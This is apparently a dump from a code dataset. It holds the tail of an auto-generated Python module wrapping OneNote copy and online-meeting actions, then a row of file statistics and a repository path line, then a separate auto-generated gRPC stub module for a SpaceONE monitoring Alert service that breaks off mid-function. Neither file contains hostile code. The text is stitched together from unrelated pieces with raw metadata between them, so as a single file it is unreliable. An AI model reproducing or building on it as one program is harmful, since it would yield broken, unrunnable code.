if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectiongroupssectionsparentnotebooksection_copy_to_section_group(client,
user_id,
section_group_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesection_copy_to_notebook(client,
user_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesection_copy_to_section_group(client,
user_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectionspage_copy_to_section(client,
user_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectionspage_onenote_patch_content(client,
user_id,
onenote_section_id,
onenote_page_id,
commands=None):
body = {}
if commands is not None:
body['commands'] = commands
return client.onenote_patch_content(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectionspagesparentnotebook_copy_notebook(client,
user_id,
onenote_section_id,
onenote_page_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectionspagesparentnotebooksectiongroupsparentnotebook_copy_notebook(client,
user_id,
onenote_section_id,
onenote_page_id,
section_group_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
section_group_id=section_group_id,
body=body)
def usersactions_usersonenotesectionspagesparentnotebooksectiongroupssection_copy_to_notebook(client,
user_id,
onenote_section_id,
onenote_page_id,
section_group_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
section_group_id=section_group_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionspagesparentnotebooksectiongroupssection_copy_to_section_group(client,
user_id,
onenote_section_id,
onenote_page_id,
section_group_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
section_group_id=section_group_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionspagesparentnotebooksection_copy_to_notebook(client,
user_id,
onenote_section_id,
onenote_page_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionspagesparentnotebooksection_copy_to_section_group(client,
user_id,
onenote_section_id,
onenote_page_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionspagesparentsection_copy_to_notebook(client,
user_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectionspagesparentsection_copy_to_section_group(client,
user_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectionsparentnotebook_copy_notebook(client,
user_id,
onenote_section_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectionsparentnotebooksectiongroupsparentnotebook_copy_notebook(client,
user_id,
onenote_section_id,
section_group_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
section_group_id=section_group_id,
body=body)
def usersactions_usersonenotesectionsparentnotebooksectiongroupssection_copy_to_notebook(client,
user_id,
onenote_section_id,
section_group_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
section_group_id=section_group_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionsparentnotebooksectiongroupssection_copy_to_section_group(client,
user_id,
onenote_section_id,
section_group_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_section_id=onenote_section_id,
section_group_id=section_group_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionsparentnotebooksection_copy_to_notebook(client,
user_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionsparentnotebooksection_copy_to_section_group(client,
user_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionsparentsectiongroupparentnotebook_copy_notebook(client,
user_id,
onenote_section_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectionsparentsectiongroupparentnotebooksection_copy_to_notebook(client,
user_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionsparentsectiongroupparentnotebooksection_copy_to_section_group(client,
user_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionsparentsectiongroupsection_copy_to_notebook(client,
user_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionsparentsectiongroupsection_copy_to_section_group(client,
user_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonlinemeeting_create_or_get(client,
user_id,
chat_info=None,
end_date_time=None,
external_id=None,
start_date_time=None,
subject=None,
attendees=None,
organizer=None):
body = {}
if chat_info is not None:
body['chat_info'] = chat_info
if end_date_time is not None:
body['end_date_time'] = end_date_time
if external_id is not None:
body['external_id'] = external_id
if start_date_time is not None:
body['start_date_time'] = start_date_time
if subject is not None:
body['subject'] = subject
body['participants'] = {}
if attendees is not None:
body['participants']['attendees'] = attendees
if organizer is not None:
body['participants']['organizer'] = organizer
if len(body['participants']) == 0:
del body['participants']
return client.create_or_get(user_id=user_id,
body=body)
| 53.115501 | 140 | 0.399711 | 26,931 | 350,881 | 4.841001 | 0.013702 | 0.085601 | 0.078904 | 0.113973 | 0.954469 | 0.94327 | 0.935639 | 0.924363 | 0.916202 | 0.910457 | 0 | 0.001774 | 0.551737 | 350,881 | 6,605 | 141 | 53.123543 | 0.827112 | 0.001425 | 0 | 0.930915 | 0 | 0 | 0.054663 | 0.009911 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.003313 | 0.006461 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
05cd8b8ad40b19073935a5b157dd5208874c560d | 24,002 | py | Python | venv/lib/python3.8/site-packages/spaceone/api/monitoring/v1/alert_pb2_grpc.py | choonho/plugin-prometheus-mon-webhook | afa7d65d12715fd0480fb4f92a9c62da2d6128e0 | [
"Apache-2.0"
] | null | null | null | venv/lib/python3.8/site-packages/spaceone/api/monitoring/v1/alert_pb2_grpc.py | choonho/plugin-prometheus-mon-webhook | afa7d65d12715fd0480fb4f92a9c62da2d6128e0 | [
"Apache-2.0"
] | null | null | null | venv/lib/python3.8/site-packages/spaceone/api/monitoring/v1/alert_pb2_grpc.py | choonho/plugin-prometheus-mon-webhook | afa7d65d12715fd0480fb4f92a9c62da2d6128e0 | [
"Apache-2.0"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from google.protobuf import struct_pb2 as google_dot_protobuf_dot_struct__pb2
from spaceone.api.monitoring.v1 import alert_pb2 as spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2
class AlertStub(object):
    """Client-side stub for the ``spaceone.api.monitoring.v1.Alert`` gRPC service.

    Auto-generated by the gRPC Python protocol compiler plugin (DO NOT EDIT
    by hand).  Each attribute assigned in ``__init__`` is a unary-unary
    multi-callable for one RPC method of the Alert service.
    """

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        # Each multi-callable serializes its request protobuf and
        # deserializes the response protobuf for one RPC method.
        self.create = channel.unary_unary(
                '/spaceone.api.monitoring.v1.Alert/create',
                request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.CreateAlertRequest.SerializeToString,
                response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
                )
        self.update = channel.unary_unary(
                '/spaceone.api.monitoring.v1.Alert/update',
                request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.UpdateAlertRequest.SerializeToString,
                response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
                )
        self.update_state = channel.unary_unary(
                '/spaceone.api.monitoring.v1.Alert/update_state',
                request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.UpdateAlertStateRequest.SerializeToString,
                response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
                )
        self.merge = channel.unary_unary(
                '/spaceone.api.monitoring.v1.Alert/merge',
                request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.MergeAlertRequest.SerializeToString,
                response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
                )
        self.snooze = channel.unary_unary(
                '/spaceone.api.monitoring.v1.Alert/snooze',
                request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.SnoozeAlertRequest.SerializeToString,
                response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
                )
        self.add_responder = channel.unary_unary(
                '/spaceone.api.monitoring.v1.Alert/add_responder',
                request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertResponderRequest.SerializeToString,
                response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
                )
        self.remove_responder = channel.unary_unary(
                '/spaceone.api.monitoring.v1.Alert/remove_responder',
                request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertResponderRequest.SerializeToString,
                response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
                )
        self.add_project_dependency = channel.unary_unary(
                '/spaceone.api.monitoring.v1.Alert/add_project_dependency',
                request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertProjectDependencyRequest.SerializeToString,
                response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
                )
        self.remove_project_dependency = channel.unary_unary(
                '/spaceone.api.monitoring.v1.Alert/remove_project_dependency',
                request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertProjectDependencyRequest.SerializeToString,
                response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
                )
        # delete returns google.protobuf.Empty rather than AlertInfo.
        self.delete = channel.unary_unary(
                '/spaceone.api.monitoring.v1.Alert/delete',
                request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertRequest.SerializeToString,
                response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
                )
        self.get = channel.unary_unary(
                '/spaceone.api.monitoring.v1.Alert/get',
                request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.GetAlertRequest.SerializeToString,
                response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
                )
        self.list = channel.unary_unary(
                '/spaceone.api.monitoring.v1.Alert/list',
                request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertQuery.SerializeToString,
                response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertsInfo.FromString,
                )
        # stat returns a free-form google.protobuf.Struct.
        self.stat = channel.unary_unary(
                '/spaceone.api.monitoring.v1.Alert/stat',
                request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertStatQuery.SerializeToString,
                response_deserializer=google_dot_protobuf_dot_struct__pb2.Struct.FromString,
                )
class AlertServicer(object):
    """Server-side interface for the ``spaceone.api.monitoring.v1.Alert`` service.

    Auto-generated by the gRPC Python protocol compiler plugin (DO NOT EDIT
    by hand).  Subclass this and override the methods below; every default
    implementation rejects the call with ``UNIMPLEMENTED``.
    """

    def create(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def update(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def update_state(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def merge(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def snooze(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def add_responder(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def remove_responder(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def add_project_dependency(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def remove_project_dependency(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def delete(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def get(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def list(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def stat(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_AlertServicer_to_server(servicer, server):
    """Register an AlertServicer implementation with a gRPC server.

    Auto-generated by the gRPC Python protocol compiler plugin (DO NOT EDIT
    by hand).  Builds one unary-unary handler per RPC method, wrapping the
    servicer's methods with the matching protobuf (de)serializers, and adds
    them to ``server`` under the ``spaceone.api.monitoring.v1.Alert`` service
    name.

    Args:
        servicer: An AlertServicer (or subclass) instance.
        server: A grpc.Server to attach the handlers to.
    """
    rpc_method_handlers = {
            'create': grpc.unary_unary_rpc_method_handler(
                    servicer.create,
                    request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.CreateAlertRequest.FromString,
                    response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
            ),
            'update': grpc.unary_unary_rpc_method_handler(
                    servicer.update,
                    request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.UpdateAlertRequest.FromString,
                    response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
            ),
            'update_state': grpc.unary_unary_rpc_method_handler(
                    servicer.update_state,
                    request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.UpdateAlertStateRequest.FromString,
                    response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
            ),
            'merge': grpc.unary_unary_rpc_method_handler(
                    servicer.merge,
                    request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.MergeAlertRequest.FromString,
                    response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
            ),
            'snooze': grpc.unary_unary_rpc_method_handler(
                    servicer.snooze,
                    request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.SnoozeAlertRequest.FromString,
                    response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
            ),
            'add_responder': grpc.unary_unary_rpc_method_handler(
                    servicer.add_responder,
                    request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertResponderRequest.FromString,
                    response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
            ),
            'remove_responder': grpc.unary_unary_rpc_method_handler(
                    servicer.remove_responder,
                    request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertResponderRequest.FromString,
                    response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
            ),
            'add_project_dependency': grpc.unary_unary_rpc_method_handler(
                    servicer.add_project_dependency,
                    request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertProjectDependencyRequest.FromString,
                    response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
            ),
            'remove_project_dependency': grpc.unary_unary_rpc_method_handler(
                    servicer.remove_project_dependency,
                    request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertProjectDependencyRequest.FromString,
                    response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
            ),
            'delete': grpc.unary_unary_rpc_method_handler(
                    servicer.delete,
                    request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertRequest.FromString,
                    response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
            ),
            'get': grpc.unary_unary_rpc_method_handler(
                    servicer.get,
                    request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.GetAlertRequest.FromString,
                    response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
            ),
            'list': grpc.unary_unary_rpc_method_handler(
                    servicer.list,
                    request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertQuery.FromString,
                    response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertsInfo.SerializeToString,
            ),
            'stat': grpc.unary_unary_rpc_method_handler(
                    servicer.stat,
                    request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertStatQuery.FromString,
                    response_serializer=google_dot_protobuf_dot_struct__pb2.Struct.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'spaceone.api.monitoring.v1.Alert', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Alert(object):
    """Static, connectionless client for the Alert service.

    Auto-generated by the gRPC Python protocol compiler plugin (DO NOT EDIT
    by hand).  Uses gRPC's EXPERIMENTAL ``grpc.experimental`` API: each
    static method opens an ad-hoc channel to ``target`` and performs a
    single unary-unary call.
    """

    @staticmethod
    def create(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/create',
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.CreateAlertRequest.SerializeToString,
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def update(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/update',
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.UpdateAlertRequest.SerializeToString,
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def update_state(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
